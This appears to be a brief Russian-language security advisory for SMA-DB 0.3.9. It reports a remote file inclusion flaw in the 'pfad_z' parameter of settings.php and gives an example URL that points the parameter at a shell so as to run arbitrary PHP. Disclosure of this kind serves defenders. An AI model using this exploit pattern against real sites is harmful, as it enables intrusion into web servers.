Программа: SMA-DB 0.3.9 

Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе.
Уязвимость существует из-за недостаточной обработки входных данных в параметре «pfad_z» сценарием settings.php. Удаленный пользователь может выполнить произвольный PHP сценарий на целевой системе с привилегиями Web сервера 

Пример:

http://www.Site.com/theme/settings.php?pfad_z=[Shell]



Оставить мнение